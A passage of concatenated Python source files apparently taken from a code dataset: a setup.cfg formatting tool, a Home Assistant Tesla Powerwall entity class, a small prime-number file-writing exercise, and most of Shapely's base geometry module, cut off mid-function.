part = part.strip()
if part.startswith('>='):
minimum = _to_ver(part[2:])
elif part.startswith('!='):
excluded.add(_to_ver(part[2:]))
else:
raise UnknownVersionError()
return minimum, excluded
def _python_requires(
setup_cfg: str, *, min_py3_version: Tuple[int, int],
) -> Optional[str]:
cfg = configparser.ConfigParser()
cfg.read(setup_cfg)
current_value = cfg.get('options', 'python_requires', fallback='')
classifiers = cfg.get('metadata', 'classifiers', fallback='')
try:
minimum, excluded = _parse_python_requires(current_value)
except UnknownVersionError: # assume they know what's up with weird things
return current_value
tox_ini = _adjacent_filename(setup_cfg, 'tox.ini')
if os.path.exists(tox_ini):
cfg = configparser.ConfigParser()
cfg.read(tox_ini)
envlist = cfg.get('tox', 'envlist', fallback='')
if envlist:
for env in envlist.split(','):
env = env.strip()
env, _, _ = env.partition('-') # py36-foo
if (
env.startswith('py') and
len(env) == 4 and
env[2:].isdigit()
):
version = _to_ver('.'.join(env[2:]))
if minimum is None or version < minimum:
minimum = version
for classifier in classifiers.strip().splitlines():
if classifier.startswith('Programming Language :: Python ::'):
version_part = classifier.split()[-1]
if '.' not in version_part:
continue
version = _to_ver(version_part)
if minimum is None or version < minimum:
minimum = version
if minimum is None:
return None
elif minimum[0] == 2:
excluded.update(_py3_excluded(min_py3_version))
return _format_python_requires(minimum, excluded)
elif min_py3_version > minimum:
return _format_python_requires(min_py3_version, excluded)
else:
return _format_python_requires(minimum, excluded)
def _requires(cfg: configparser.ConfigParser, which: str) -> List[str]:
raw = cfg.get('options', which, fallback='')
install_requires = raw.strip().splitlines()
if not install_requires:
return []
normalized = sorted(
(_normalize_req(req) for req in install_requires),
key=lambda req: (';' in req, _req_base(req), req),
)
normalized.insert(0, '')
return normalized
def _normalize_req(req: str) -> str:
lib, _, envs = req.partition(';')
normalized = _normalize_lib(lib)
envs = envs.strip()
if not envs:
return normalized
return f'{normalized};{envs}'
BASE_NAME_REGEX = re.compile(r'[^!=><\s]+')
REQ_REGEX = re.compile(r'(===|==|!=|~=|>=?|<=?)\s*([^,]+)')
def _normalize_lib(lib: str) -> str:
base = _req_base(lib)
conditions = ','.join(
sorted(
(
f'{m.group(1)}{m.group(2)}'
for m in REQ_REGEX.finditer(lib)
),
key=lambda c: ('<' in c, '>' in 'c', c),
),
)
return f'{base}{conditions}'
def _req_base(lib: str) -> str:
basem = re.match(BASE_NAME_REGEX, lib)
assert basem
return basem.group(0)
def _py_classifiers(
python_requires: Optional[str], *, max_py_version: Tuple[int, int],
) -> Optional[str]:
try:
minimum, exclude = _parse_python_requires(python_requires)
except UnknownVersionError:
return None
if minimum is None: # don't have a sequence of versions to iterate over
return None
versions: Set[Tuple[int, ...]] = set()
while minimum <= max_py_version:
if minimum not in exclude:
versions.add(minimum)
versions.add(minimum[:1])
if minimum == (2, 7):
minimum = (3, 0)
else:
minimum = (minimum[0], minimum[1] + 1)
classifiers = [
f'Programming Language :: Python :: {_v(v)}' for v in versions
]
if (3,) in versions and (2,) not in versions:
classifiers.append('Programming Language :: Python :: 3 :: Only')
return '\n'.join(classifiers)
def _trim_py_classifiers(
classifiers: List[str],
python_requires: Optional[str],
*,
max_py_version: Tuple[int, int],
) -> List[str]:
try:
minimum, exclude = _parse_python_requires(python_requires)
except UnknownVersionError:
return classifiers
def _is_ok_classifier(s: str) -> bool:
parts = s.split(' :: ')
if (
# can't know if it applies without a minimum
minimum is None or
# handle Python :: 3 :: Only
len(parts) != 3 or
not s.startswith('Programming Language :: Python :: ')
):
return True
ver = tuple(int(p) for p in parts[-1].strip().split('.'))
size = len(ver)
return (
ver not in exclude and
# https://github.com/python/mypy/issues/7056
minimum[:size] <= ver <= max_py_version[:size] # type: ignore
)
return [s for s in classifiers if _is_ok_classifier(s)]
def format_file(
filename: str, *,
min_py3_version: Tuple[int, int],
max_py_version: Tuple[int, int],
) -> bool:
with open(filename) as f:
contents = f.read()
cfg = configparser.ConfigParser()
cfg.read_string(contents)
# normalize names to underscores so sdist / wheel have the same prefix
cfg['metadata']['name'] = cfg['metadata']['name'].replace('-', '_')
# if README.md exists, set `long_description` + content type
readme = _first_file(filename, 'readme')
if readme is not None:
long_description = f'file: {os.path.basename(readme)}'
cfg['metadata']['long_description'] = long_description
tags = identify.tags_from_filename(readme)
if 'markdown' in tags:
cfg['metadata']['long_description_content_type'] = 'text/markdown'
elif 'rst' in tags:
cfg['metadata']['long_description_content_type'] = 'text/x-rst'
else:
cfg['metadata']['long_description_content_type'] = 'text/plain'
# set license fields if a license exists
license_filename = _first_file(filename, 'licen[sc]e')
if license_filename is not None:
cfg['metadata']['license_file'] = os.path.basename(license_filename)
license_id = identify.license_id(license_filename)
if license_id is not None:
cfg['metadata']['license'] = license_id
if license_id in LICENSE_TO_CLASSIFIER:
cfg['metadata']['classifiers'] = (
cfg['metadata'].get('classifiers', '').rstrip() +
f'\n{LICENSE_TO_CLASSIFIER[license_id]}'
)
requires = _python_requires(filename, min_py3_version=min_py3_version)
if requires is not None:
if not cfg.has_section('options'):
cfg.add_section('options')
cfg['options']['python_requires'] = requires
install_requires = _requires(cfg, 'install_requires')
if install_requires:
cfg['options']['install_requires'] = '\n'.join(install_requires)
setup_requires = _requires(cfg, 'setup_requires')
if setup_requires:
cfg['options']['setup_requires'] = '\n'.join(setup_requires)
py_classifiers = _py_classifiers(requires, max_py_version=max_py_version)
if py_classifiers:
cfg['metadata']['classifiers'] = (
cfg['metadata'].get('classifiers', '').rstrip() +
f'\n{py_classifiers}'
)
# sort the classifiers if present
if 'classifiers' in cfg['metadata']:
classifiers = sorted(set(cfg['metadata']['classifiers'].split('\n')))
classifiers = _trim_py_classifiers(
classifiers, requires, max_py_version=max_py_version,
)
cfg['metadata']['classifiers'] = '\n'.join(classifiers)
sections: Dict[str, Dict[str, str]] = {}
for section, key_order in KEYS_ORDER:
if section not in cfg:
continue
new_section = {
k: cfg[section].pop(k) for k in key_order if k in cfg[section]
}
# sort any remaining keys
new_section.update(sorted(cfg[section].items()))
sections[section] = new_section
cfg.pop(section)
for section in cfg.sections():
sections[section] = dict(cfg[section])
cfg.pop(section)
for k, v in sections.items():
cfg[k] = v
sio = io.StringIO()
cfg.write(sio)
new_contents = sio.getvalue().strip() + '\n'
new_contents = new_contents.replace('\t', ' ')
new_contents = new_contents.replace(' \n', '\n')
if new_contents != contents:
with open(filename, 'w') as f:
f.write(new_contents)
return new_contents != contents
def _ver_type(s: str) -> Tuple[int, int]:
try:
return _to_ver(s)
except UnknownVersionError:
raise argparse.ArgumentTypeError(f'expected #.#, got {s!r}')
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--min-py3-version', type=_ver_type, default=(3, 5))
parser.add_argument('--max-py-version', type=_ver_type, default=(3, 7))
args = parser.parse_args(argv)
for filename in args.filenames:
if format_file(
filename,
min_py3_version=args.min_py3_version,
max_py_version=args.max_py_version,
):
print(f'Rewriting {filename}')
return 0
if __name__ == '__main__':
exit(main())
|
the-stack_106_13025
|
"""The Tesla Powerwall integration base entity."""
from homeassistant.helpers.entity import Entity
from .const import (
DOMAIN,
MANUFACTURER,
MODEL,
POWERWALL_SITE_NAME,
SITE_INFO_GRID_CODE,
SITE_INFO_NOMINAL_SYSTEM_ENERGY_KWH,
SITE_INFO_UTILITY,
)
class PowerWallEntity(Entity):
"""Base class for powerwall entities."""
def __init__(self, coordinator, site_info):
"""Initialize the sensor."""
super().__init__()
self._coordinator = coordinator
self._site_info = site_info
# This group of properties will be unique to to the site
unique_group = (
site_info[SITE_INFO_UTILITY],
site_info[SITE_INFO_GRID_CODE],
str(site_info[SITE_INFO_NOMINAL_SYSTEM_ENERGY_KWH]),
)
self.base_unique_id = "_".join(unique_group)
@property
def device_info(self):
"""Powerwall device info."""
return {
"identifiers": {(DOMAIN, self.base_unique_id)},
"name": self._site_info[POWERWALL_SITE_NAME],
"manufacturer": MANUFACTURER,
"model": MODEL,
}
@property
def available(self):
"""Return True if entity is available."""
return self._coordinator.last_update_success
@property
def should_poll(self):
"""Return False, updates are controlled via coordinator."""
return False
async def async_update(self):
"""Update the entity.
Only used by the generic entity update service.
"""
await self._coordinator.async_request_refresh()
async def async_added_to_hass(self):
"""Subscribe to updates."""
self._coordinator.async_add_listener(self.async_write_ha_state)
async def async_will_remove_from_hass(self):
"""Undo subscription."""
self._coordinator.async_remove_listener(self.async_write_ha_state)
|
the-stack_106_13026
|
"""
将1-9999之间的素数分别写入三个文件中(1-99之间的素数保存在a.txt中,
100-999之间的素数保存在b.txt中,1000-9999之间的素数保存在c.txt中)。
"""
from math import sqrt
def is_prime(n):
"""判断素数的函数"""
assert n > 0
for factor in range(2, int(sqrt(n)) + 1):
if n % factor == 0:
return False
return True if n != 1 else False
def main():
filenames = ('a.txt', 'b.txt', 'c.txt')
fs_list = []
try:
for filename in filenames:
fs_list.append(open(filename, 'w', encoding='utf-8'))
for number in range(1, 10000):
if is_prime(number):
if number < 100:
fs_list[0].write(str(number) + '\n')
elif number < 1000:
fs_list[1].write(str(number) + '\n')
else:
fs_list[2].write(str(number) + '\n')
except IOError as ex:
print(ex)
print('写文件时发生错误!')
finally:
for fs in fs_list:
fs.close()
print('操作完成!')
if __name__ == '__main__':
main()
# 试一试有什么不一样
# # with open('prime.txt', 'a') as f:
# with open('prime.txt', 'w') as f:
# for num in range(2, 100):
# if is_prime(num):
# f.write(str(num) + '\n')
# print('写入完成!')
|
the-stack_106_13028
|
"""Base geometry class and utilities
Note: a third, z, coordinate value may be used when constructing
geometry objects, but has no effect on geometric analysis. All
operations are performed in the x-y plane. Thus, geometries with
different z values may intersect or be equal.
"""
from binascii import a2b_hex
from ctypes import pointer, c_size_t, c_char_p, c_void_p
from itertools import islice
import math
import sys
from warnings import warn
from functools import wraps
from shapely.affinity import affine_transform
from shapely.coords import CoordinateSequence
from shapely.errors import WKBReadingError, WKTReadingError
from shapely.geos import WKBWriter, WKTWriter
from shapely.geos import lgeos
from shapely.impl import DefaultImplementation, delegated
if sys.version_info[0] < 3:
range = xrange
integer_types = (int, long)
else:
integer_types = (int,)
try:
import numpy as np
integer_types = integer_types + (np.integer,)
except ImportError:
pass
GEOMETRY_TYPES = [
'Point',
'LineString',
'LinearRing',
'Polygon',
'MultiPoint',
'MultiLineString',
'MultiPolygon',
'GeometryCollection',
]
def dump_coords(geom):
"""Dump coordinates of a geometry in the same order as data packing"""
if not isinstance(geom, BaseGeometry):
raise ValueError('Must be instance of a geometry class; found ' +
geom.__class__.__name__)
elif geom.type in ('Point', 'LineString', 'LinearRing'):
return geom.coords[:]
elif geom.type == 'Polygon':
return geom.exterior.coords[:] + [i.coords[:] for i in geom.interiors]
elif geom.type.startswith('Multi') or geom.type == 'GeometryCollection':
# Recursive call
return [dump_coords(part) for part in geom]
else:
raise ValueError('Unhandled geometry type: ' + repr(geom.type))
def geometry_type_name(g):
if g is None:
raise ValueError("Null geometry has no type")
return GEOMETRY_TYPES[lgeos.GEOSGeomTypeId(g)]
def geom_factory(g, parent=None):
# Abstract geometry factory for use with topological methods below
if not g:
raise ValueError("No Shapely geometry can be created from null value")
ob = BaseGeometry()
geom_type = geometry_type_name(g)
# TODO: check cost of dynamic import by profiling
mod = __import__(
'shapely.geometry',
globals(),
locals(),
[geom_type],
)
ob.__class__ = getattr(mod, geom_type)
ob._geom = g
ob.__p__ = parent
if lgeos.methods['has_z'](g):
ob._ndim = 3
else:
ob._ndim = 2
ob._is_empty = False
return ob
def geom_from_wkt(data):
warn("`geom_from_wkt` is deprecated. Use `geos.wkt_reader.read(data)`.",
DeprecationWarning)
if sys.version_info[0] >= 3:
data = data.encode('ascii')
geom = lgeos.GEOSGeomFromWKT(c_char_p(data))
if not geom:
raise WKTReadingError(
"Could not create geometry because of errors while reading input.")
return geom_factory(geom)
def geom_to_wkt(ob):
warn("`geom_to_wkt` is deprecated. Use `geos.wkt_writer.write(ob)`.",
DeprecationWarning)
if ob is None or ob._geom is None:
raise ValueError("Null geometry supports no operations")
return lgeos.GEOSGeomToWKT(ob._geom)
def deserialize_wkb(data):
geom = lgeos.GEOSGeomFromWKB_buf(c_char_p(data), c_size_t(len(data)))
if not geom:
raise WKBReadingError(
"Could not create geometry because of errors while reading input.")
return geom
def geom_from_wkb(data):
warn("`geom_from_wkb` is deprecated. Use `geos.wkb_reader.read(data)`.",
DeprecationWarning)
return geom_factory(deserialize_wkb(data))
def geom_to_wkb(ob):
warn("`geom_to_wkb` is deprecated. Use `geos.wkb_writer.write(ob)`.",
DeprecationWarning)
if ob is None or ob._geom is None:
raise ValueError("Null geometry supports no operations")
size = c_size_t()
return lgeos.GEOSGeomToWKB_buf(c_void_p(ob._geom), pointer(size))
def geos_geom_from_py(ob, create_func=None):
"""Helper function for geos_*_from_py functions in each geom type.
If a create_func is specified the coodinate sequence is cloned and a new
geometry is created with it, otherwise the geometry is cloned directly.
This behaviour is useful for converting between LineString and LinearRing
objects.
"""
if create_func is None:
geom = lgeos.GEOSGeom_clone(ob._geom)
else:
cs = lgeos.GEOSGeom_getCoordSeq(ob._geom)
cs = lgeos.GEOSCoordSeq_clone(cs)
geom = create_func(cs)
N = ob._ndim
return geom, N
def exceptNull(func):
"""Decorator which helps avoid GEOS operations on null pointers."""
@wraps(func)
def wrapper(*args, **kwargs):
if not args[0]._geom or args[0].is_empty:
raise ValueError("Null/empty geometry supports no operations")
return func(*args, **kwargs)
return wrapper
class CAP_STYLE(object):
round = 1
flat = 2
square = 3
class JOIN_STYLE(object):
round = 1
mitre = 2
bevel = 3
EMPTY = deserialize_wkb(a2b_hex(b'010700000000000000'))
class BaseGeometry(object):
"""
Provides GEOS spatial predicates and topological operations.
"""
# Attributes
# ----------
# __geom__ : c_void_p
# Cached ctypes pointer to GEOS geometry. Not to be accessed.
# _geom : c_void_p
# Property by which the GEOS geometry is accessed.
# __p__ : object
# Parent (Shapely) geometry
# _ctypes_data : object
# Cached ctypes data buffer
# _ndim : int
# Number of dimensions (2 or 3, generally)
# _crs : object
# Coordinate reference system. Available for Shapely extensions, but
# not implemented here.
# _other_owned : bool
# True if this object's GEOS geometry is owned by another as in the
# case of a multipart geometry member.
__geom__ = EMPTY
__p__ = None
_ctypes_data = None
_ndim = None
_crs = None
_other_owned = False
_is_empty = True
# Backend config
impl = DefaultImplementation
# a reference to the so/dll proxy to preserve access during clean up
_lgeos = lgeos
def empty(self, val=EMPTY):
# TODO: defer cleanup to the implementation. We shouldn't be
# explicitly calling a lgeos method here.
if not self._is_empty and not self._other_owned and self.__geom__:
try:
self._lgeos.GEOSGeom_destroy(self.__geom__)
except (AttributeError, TypeError):
pass # _lgeos might be empty on shutdown
self._is_empty = True
self.__geom__ = val
def __del__(self):
self.empty(val=None)
self.__p__ = None
def __str__(self):
return self.wkt
# To support pickling
def __reduce__(self):
return (self.__class__, (), self.wkb)
def __setstate__(self, state):
self.empty()
self.__geom__ = deserialize_wkb(state)
self._is_empty = False
if lgeos.methods['has_z'](self.__geom__):
self._ndim = 3
else:
self._ndim = 2
@property
def _geom(self):
return self.__geom__
@_geom.setter
def _geom(self, val):
self.empty()
self._is_empty = val in [EMPTY, None]
self.__geom__ = val
# Operators
# ---------
def __and__(self, other):
return self.intersection(other)
def __or__(self, other):
return self.union(other)
def __sub__(self, other):
return self.difference(other)
def __xor__(self, other):
return self.symmetric_difference(other)
def __eq__(self, other):
return (
type(other) == type(self) and
tuple(self.coords) == tuple(other.coords)
)
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
# Array and ctypes interfaces
# ---------------------------
@property
def ctypes(self):
"""Return ctypes buffer"""
raise NotImplementedError
@property
def array_interface_base(self):
if sys.byteorder == 'little':
typestr = '<f8'
elif sys.byteorder == 'big':
typestr = '>f8'
else:
raise ValueError(
"Unsupported byteorder: neither little nor big-endian")
return {
'version': 3,
'typestr': typestr,
'data': self.ctypes,
}
@property
def __array_interface__(self):
"""Provide the Numpy array protocol."""
raise NotImplementedError
# Coordinate access
# -----------------
def _get_coords(self):
"""Access to geometry's coordinates (CoordinateSequence)"""
if self.is_empty:
return []
return CoordinateSequence(self)
def _set_coords(self, ob):
raise NotImplementedError(
"set_coords must be provided by derived classes")
coords = property(_get_coords, _set_coords)
@property
def xy(self):
"""Separate arrays of X and Y coordinate values"""
raise NotImplementedError
# Python feature protocol
@property
def __geo_interface__(self):
"""Dictionary representation of the geometry"""
raise NotImplementedError
# Type of geometry and its representations
# ----------------------------------------
def geometryType(self):
return geometry_type_name(self._geom)
@property
def type(self):
return self.geometryType()
def to_wkb(self):
warn("`to_wkb` is deprecated. Use the `wkb` property.",
DeprecationWarning)
return geom_to_wkb(self)
def to_wkt(self):
warn("`to_wkt` is deprecated. Use the `wkt` property.",
DeprecationWarning)
return geom_to_wkt(self)
@property
def wkt(self):
"""WKT representation of the geometry"""
return WKTWriter(lgeos).write(self)
@property
def wkb(self):
"""WKB representation of the geometry"""
return WKBWriter(lgeos).write(self)
@property
def wkb_hex(self):
"""WKB hex representation of the geometry"""
return WKBWriter(lgeos).write_hex(self)
def svg(self, scale_factor=1., **kwargs):
"""Raises NotImplementedError"""
raise NotImplementedError
def _repr_svg_(self):
"""SVG representation for iPython notebook"""
svg_top = '<svg xmlns="http://www.w3.org/2000/svg" ' \
'xmlns:xlink="http://www.w3.org/1999/xlink" '
if self.is_empty:
return svg_top + '/>'
else:
# Establish SVG canvas that will fit all the data + small space
xmin, ymin, xmax, ymax = self.bounds
if xmin == xmax and ymin == ymax:
# This is a point; buffer using an arbitrary size
xmin, ymin, xmax, ymax = self.buffer(1).bounds
else:
# Expand bounds by a fraction of the data ranges
expand = 0.04 # or 4%, same as R plots
widest_part = max([xmax - xmin, ymax - ymin])
expand_amount = widest_part * expand
xmin -= expand_amount
ymin -= expand_amount
xmax += expand_amount
ymax += expand_amount
dx = xmax - xmin
dy = ymax - ymin
width = min([max([100., dx]), 300])
height = min([max([100., dy]), 300])
try:
scale_factor = max([dx, dy]) / max([width, height])
except ZeroDivisionError:
scale_factor = 1.
view_box = "{} {} {} {}".format(xmin, ymin, dx, dy)
transform = "matrix(1,0,0,-1,0,{})".format(ymax + ymin)
return svg_top + (
'width="{1}" height="{2}" viewBox="{0}" '
'preserveAspectRatio="xMinYMin meet">'
'<g transform="{3}">{4}</g></svg>'
).format(view_box, width, height, transform,
self.svg(scale_factor))
@property
def geom_type(self):
"""Name of the geometry's type, such as 'Point'"""
return self.geometryType()
# Real-valued properties and methods
# ----------------------------------
@property
def area(self):
"""Unitless area of the geometry (float)"""
return self.impl['area'](self)
def distance(self, other):
"""Unitless distance to other geometry (float)"""
return self.impl['distance'](self, other)
def hausdorff_distance(self, other):
"""Unitless hausdorff distance to other geometry (float)"""
return self.impl['hausdorff_distance'](self, other)
@property
def length(self):
"""Unitless length of the geometry (float)"""
return self.impl['length'](self)
# Topological properties
# ----------------------
@property
def boundary(self):
"""Returns a lower dimension geometry that bounds the object
The boundary of a polygon is a line, the boundary of a line is a
collection of points. The boundary of a point is an empty (null)
collection.
"""
return geom_factory(self.impl['boundary'](self))
@property
def bounds(self):
"""Returns minimum bounding region (minx, miny, maxx, maxy)"""
if self.is_empty:
return ()
else:
return self.impl['bounds'](self)
@property
def centroid(self):
"""Returns the geometric center of the object"""
return geom_factory(self.impl['centroid'](self))
@delegated
def representative_point(self):
"""Returns a point guaranteed to be within the object, cheaply."""
return geom_factory(self.impl['representative_point'](self))
@property
def convex_hull(self):
"""Imagine an elastic band stretched around the geometry: that's a
convex hull, more or less
The convex hull of a three member multipoint, for example, is a
triangular polygon.
"""
return geom_factory(self.impl['convex_hull'](self))
@property
def envelope(self):
"""A figure that envelopes the geometry"""
return geom_factory(self.impl['envelope'](self))
@property
def minimum_rotated_rectangle(self):
"""Returns the general minimum bounding rectangle of
the geometry. Can possibly be rotated. If the convex hull
of the object is a degenerate (line or point) this same degenerate
is returned.
"""
# first compute the convex hull
hull = self.convex_hull
try:
coords = hull.exterior.coords
except AttributeError: # may be a Point or a LineString
return hull
# generate the edge vectors between the convex hull's coords
edges = ((pt2[0] - pt1[0], pt2[1] - pt1[1]) for pt1, pt2 in zip(
coords, islice(coords, 1, None)))
def _transformed_rects():
for dx, dy in edges:
# compute the normalized direction vector of the edge
# vector.
length = math.sqrt(dx ** 2 + dy ** 2)
ux, uy = dx / length, dy / length
# compute the normalized perpendicular vector
vx, vy = -uy, ux
# transform hull from the original coordinate system to
# the coordinate system defined by the edge and compute
# the axes-parallel bounding rectangle.
transf_rect = affine_transform(
hull, (ux, uy, vx, vy, 0, 0)).envelope
# yield the transformed rectangle and a matrix to
# transform it back to the original coordinate system.
yield (transf_rect, (ux, vx, uy, vy, 0, 0))
# check for the minimum area rectangle and return it
transf_rect, inv_matrix = min(
_transformed_rects(), key=lambda r: r[0].area)
return affine_transform(transf_rect, inv_matrix)
def buffer(self, distance, resolution=16, quadsegs=None,
cap_style=CAP_STYLE.round, join_style=JOIN_STYLE.round,
mitre_limit=5.0):
"""Returns a geometry with an envelope at a distance from the object's
envelope
A negative distance has a "shrink" effect. A zero distance may be used
to "tidy" a polygon. The resolution of the buffer around each vertex of
the object increases by increasing the resolution keyword parameter
or second positional parameter. Note: the use of a `quadsegs` parameter
is deprecated and will be gone from the next major release.
The styles of caps are: CAP_STYLE.round (1), CAP_STYLE.flat (2), and
CAP_STYLE.square (3).
The styles of joins between offset segments are: JOIN_STYLE.round (1),
JOIN_STYLE.mitre (2), and JOIN_STYLE.bevel (3).
The mitre limit ratio is used for very sharp corners. The mitre ratio
is the ratio of the distance from the corner to the end of the mitred
offset corner. When two line segments meet at a sharp angle, a miter
join will extend the original geometry. To prevent unreasonable
geometry, the mitre limit allows controlling the maximum length of the
join corner. Corners with a ratio which exceed the limit will be
beveled.
Example:
>>> from shapely.wkt import loads
>>> g = loads('POINT (0.0 0.0)')
>>> g.buffer(1.0).area # 16-gon approx of a unit radius circle
3.1365484905459389
>>> g.buffer(1.0, 128).area # 128-gon approximation
3.1415138011443009
>>> g.buffer(1.0, 3).area # triangle approximation
3.0
>>> list(g.buffer(1.0, cap_style=CAP_STYLE.square).exterior.coords)
[(1.0, 1.0), (1.0, -1.0), (-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0)]
>>> g.buffer(1.0, cap_style=CAP_STYLE.square).area
4.0
"""
if quadsegs is not None:
warn(
"The `quadsegs` argument is deprecated. Use `resolution`.",
DeprecationWarning)
res = quadsegs
else:
res = resolution
if mitre_limit == 0.0:
raise ValueError(
'Cannot compute offset from zero-length line segment')
if cap_style == CAP_STYLE.round and join_style == JOIN_STYLE.round:
return geom_factory(self.impl['buffer'](self, distance, res))
if 'buffer_with_style' not in self.impl:
raise NotImplementedError("Styled buffering not available for "
"GEOS versions < 3.2.")
return geom_factory(self.impl['buffer_with_style'](self, distance, res,
cap_style,
join_style,
mitre_limit))
@delegated
def simplify(self, tolerance, preserve_topology=True):
"""Returns a simplified geometry produced by the Douglas-Peucker
algorithm
Coordinates of the simplified geometry will be no more than the
tolerance distance from the original. Unless the topology preserving
option is used, the algorithm may produce self-intersecting or
otherwise invalid geometries.
"""
if preserve_topology:
op = self.impl['topology_preserve_simplify']
else:
op = self.impl['simplify']
return geom_factory(op(self, tolerance))
# Binary operations
# -----------------
def difference(self, other):
"""Returns the difference of the geometries"""
return geom_factory(self.impl['difference'](self, other))
def intersection(self, other):
"""Returns the intersection of the geometries"""
return geom_factory(self.impl['intersection'](self, other))
def symmetric_difference(self, other):
"""Returns the symmetric difference of the geometries
(Shapely geometry)"""
return geom_factory(self.impl['symmetric_difference'](self, other))
def union(self, other):
"""Returns the union of the geometries (Shapely geometry)"""
return geom_factory(self.impl['union'](self, other))
# Unary predicates
# ----------------
@property
def has_z(self):
"""True if the geometry's coordinate sequence(s) have z values (are
3-dimensional)"""
return bool(self.impl['has_z'](self))
@property
def is_empty(self):
"""True if the set of points in this geometry is empty, else False"""
return (self._geom is None) or bool(self.impl['is_empty'](self))
@property
def is_ring(self):
"""True if the geometry is a closed ring, else False"""
return bool(self.impl['is_ring'](self))
@property
def is_closed(self):
"""True if the geometry is closed, else False
Applicable only to 1-D geometries."""
if self.geom_type == 'LinearRing':
return True
elif self.geom_type == 'LineString':
if 'is_closed' in self.impl:
return bool(self.impl['is_closed'](self))
else:
return self.coords[0] == self.coords[-1]
else:
return False
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return bool(self.impl['is_simple'](self))
@property
def is_valid(self):
"""True if the geometry is valid (definition depends on sub-class),
else False"""
return bool(self.impl['is_valid'](self))
# Binary predicates
# -----------------
def relate(self, other):
"""Returns the DE-9IM intersection matrix for the two geometries
(string)"""
return self.impl['relate'](self, other)
def covers(self, other):
"""Returns True if the geometry covers the other, else False"""
return bool(self.impl['covers'](self, other))
def contains(self, other):
"""Returns True if the geometry contains the other, else False"""
return bool(self.impl['contains'](self, other))
def crosses(self, other):
"""Returns True if the geometries cross, else False"""
return bool(self.impl['crosses'](self, other))
def disjoint(self, other):
"""Returns True if geometries are disjoint, else False"""
return bool(self.impl['disjoint'](self, other))
def equals(self, other):
"""Returns True if geometries are equal, else False
Refers to point-set equality (or topological equality), and is equivalent to
(self.within(other) & self.contains(other))
"""
return bool(self.impl['equals'](self, other))
def intersects(self, other):
"""Returns True if geometries intersect, else False"""
return bool(self.impl['intersects'](self, other))
def overlaps(self, other):
"""Returns True if geometries overlap, else False"""
return bool(self.impl['overlaps'](self, other))
def touches(self, other):
"""Returns True if geometries touch, else False"""
return bool(self.impl['touches'](self, other))
def within(self, other):
"""Returns True if geometry is within the other, else False"""
return bool(self.impl['within'](self, other))
def equals_exact(self, other, tolerance):
"""Returns True if geometries are equal to within a specified
tolerance
Refers to coordinate equality, which requires coordinates to be equal
and in the same order for all components of a geometry
"""
return bool(self.impl['equals_exact'](self, other, tolerance))
def almost_equals(self, other, decimal=6):
"""Returns True if geometries are equal at all coordinates to a
specified decimal place
Refers to approximate coordinate equality, which requires coordinates be
approximately equal and in the same order for all components of a geometry.
"""
return self.equals_exact(other, 0.5 * 10**(-decimal))
def relate_pattern(self, other, pattern):
"""Returns True if the DE-9IM string code for the relationship between
the geometries satisfies the pattern, else False"""
pattern = c_char_p(pattern.encode('ascii'))
return bool(self.impl['relate_pattern'](self, other, pattern))
# Linear referencing
# ------------------
@delegated
def project(self, other, normalized=False):
"""Returns the distance along this geometry to a point nearest the
specified point
If the normalized arg is True, return the distance normalized to the
length of the linear geometry.
"""
if normalized:
op = self.impl['project_normalized']
else:
op = self.impl['project']
return op(self, other)
@delegated
@exceptNull
def interpolate(self, distance, normalized=False):
"""Return a point at the specified distance along a linear geometry
Negative length values are taken as measured in the reverse
direction from the end of the geometry. Out-of-range index
values are handled by clamping them to the valid range of values.
If the normalized arg is True, the distance will be interpreted as a
fraction of the geometry's length.
"""
if normalized:
op = self.impl['interpolate_normalized']
else:
op = self.impl['interpolate']
return geom_factory(op(self, distance))
class BaseMultipartGeometry(BaseGeometry):
def shape_factory(self, *args):
# Factory for part instances, usually a geometry class
raise NotImplementedError("To be implemented by derived classes")
@property
def ctypes(self):
raise NotImplementedError(
"Multi-part geometries have no ctypes representations")
@property
def __array_interface__(self):
"""Provide the Numpy array protocol."""
raise NotImplementedError("Multi-part geometries do not themselves "
"provide the array interface")
def _get_coords(self):
raise NotImplementedError("Sub-geometries may have coordinate "
"sequences, but collections do not")
def _set_coords(self, ob):
raise NotImplementedError("Sub-geometries may have coordinate "
"sequences, but collections do not")
@property
def coords(self):
raise NotImplementedError(
"Multi-part geometries do not provide a coordinate sequence")
@property
def geoms(self):
if self.is_empty:
return []
return GeometrySequence(self, self.shape_factory)
def __iter__(self):
if not self.is_empty:
return iter(self.geoms)
else:
return iter([])
def __len__(self):
if not self.is_empty:
return len(self.geoms)
else:
return 0
def __getitem__(self, index):
if not self.is_empty:
return self.geoms[index]
else:
return ()[index]
def __eq__(self, other):
return (
type(other) == type(self) and
len(self) == len(other) and
all(x == y for x, y in zip(self, other))
)
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
def svg(self, scale_factor=1., color=None):
"""Returns a group of SVG elements for the multipart geometry.
Parameters
==========
scale_factor : float
Multiplication factor for the SVG stroke-width. Default is 1.
color : str, optional
Hex string for stroke or fill color. Default is to use "#66cc99"
if geometry is valid, and "#ff3333" if invalid.
"""
if self.is_empty:
return '<g />'
if color is None:
color = "#66cc99" if self.is_valid else "#ff3333"
return '<g>' + \
''.join(p.svg(scale_factor, color) for p in self) + \
'</g>'
class GeometrySequence(object):
"""
Iterative access to members of a homogeneous multipart geometry.
"""
# Attributes
# ----------
# _factory : callable
# Returns instances of Shapely geometries
# _geom : c_void_p
# Ctypes pointer to the parent's GEOS geometry
# _ndim : int
# Number of dimensions (2 or 3, generally)
# __p__ : object
# Parent (Shapely) geometry
shape_factory = None
_geom = None
__p__ = None
_ndim = None
def __init__(self, parent, type):
self.shape_factory = type
self.__p__ = parent
def _update(self):
self._geom = self.__p__._geom
self._ndim = self.__p__._ndim
def _get_geom_item(self, i):
g = self.shape_factory()
g._other_owned = True
g._geom = lgeos.GEOSGetGeometryN(self._geom, i)
g._ndim = self._ndim
g.__p__ = self
return g
def __iter__(self):
self._update()
for i in range(self.__len__()):
yield self._get_geom_item(i)
def __len__(self):
self._update()
return lgeos.GEOSGetNumGeometries(self._geom)
def __getitem__(self, key):
self._update()
m = self.__len__()
if isinstance(key, integer_types):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_geom_item(i)
elif isinstance(key, slice):
if type(self) == HeterogeneousGeometrySequence:
raise TypeError(
"Heterogenous geometry collections are not sliceable")
res = []
